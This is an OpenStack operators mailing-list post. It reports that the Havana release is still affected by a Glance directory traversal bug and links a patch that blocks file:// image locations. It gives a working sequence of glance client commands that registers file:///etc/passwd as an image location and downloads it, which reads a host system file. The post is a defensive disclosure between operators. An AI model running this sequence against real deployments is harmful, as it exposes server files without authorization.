[Openstack-operators] glance directory traversal bug and havana

Jesse Keating jlk at bluebox.net
Thu Jan 8 17:37:15 UTC 2015


On 1/7/15 8:47 PM, George Shuklin wrote:
> I spend few hours trying to backport to Havana, but than I found,  that
> Havana seems be immune to the bug.  I'm not 100% sure, so someone else
> advised to look too.
>
> The bug was that icehouse+ accepts all supported schemas. Fix excludes
> 'bad' schemes. Although Havana have explicitly given list of accepted
> schemes for location field, and 'bad' schemes are not in it.
>

Havana is certainly not immune. I was able to fetch content from the 
system fairly easily.

Start with an updated glance client

Modify it as listed in 
https://bugs.launchpad.net/glance/+bug/1400966/comments/6

$ glance image-create --disk-format raw --container-format bare

$ glance image-update --size 700 <image_id>

$ glance --os-image-api-version 2 location-add --url file:///etc/passwd

$ glance image-download <image_id>


That got me (some of) the contents of /etc/passwd.

The patch I posted prevented this from happening. It blocks adding a 
location that is file:// based, but still allows other location adds 
that should be allowed.

https://github.com/blueboxgroup/glance/commit/7ab98b72802de1d5695d35306e32293463977496

-- 
-jlk



More information about the OpenStack-operators mailing list